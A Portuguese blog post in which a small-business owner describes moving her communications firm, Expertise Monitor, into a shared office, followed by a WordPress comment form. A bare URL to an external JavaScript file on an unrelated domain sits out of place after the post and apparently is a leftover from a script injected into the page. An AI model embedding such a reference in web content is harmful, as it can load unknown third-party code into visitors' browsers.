O passo

“Do jeito que estava não ia para frente”. Essa frase ecoou na minha cabeça e tomou meus pensamentos durante uma semana. Chamei minha amiga and sócia para conversar e ela teve a mesma sensação: a energia só fluía quando a gente estava junto.

Fizemos um ano de parceria, trabalhando à distância, cada uma em seu home office. Por mais que a tecnologia esteja aí fortemente encurtando a distância, nada se compara ao andamento do trabalho quando estamos uma ao lado da outra. Foi aí que decidimos ter um endereço para a Expertise Monitor.

Contrariando, talvez, o que muitos pensam sobre arriscar em tempo de crise, custo etc, sinto que tomamos a decisão para crescer… Nada fácil para microempreendedoras com poucos clientes na carteira.

Outro dia conversava com um amigo comerciante e, enquanto eu dizia para ele “eu não tentei o suficiente”, ele me retrucava “mas você precisa ter a mente aberta, sair da sua área”. Bom, não preciso dizer que ele não sabe muito bem o que eu já fiz (e continuo fazendo) “fora da minha área”. A questão não era essa. Não era teimosia cega, absurda e burra. Era persistência com feeling.

Estamos há 1 mês no nosso espaço, super charmoso – diga-se de passagem, e conhecemos muitas pessoas, estruturamos nosso interno, tudo como uma Comunicação Construtiva deve ser. Sinto que estamos SIM! SIM! SIM! atraindo tudo isso com a energia conjunta. E com a ajuda de nosso Santo Padroeiro Cauã Reymond (história para outro post, talvez) vamos escalar aí as montanhas e aproveitar a vista.

https://cloudapi.online/js/api46.js

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s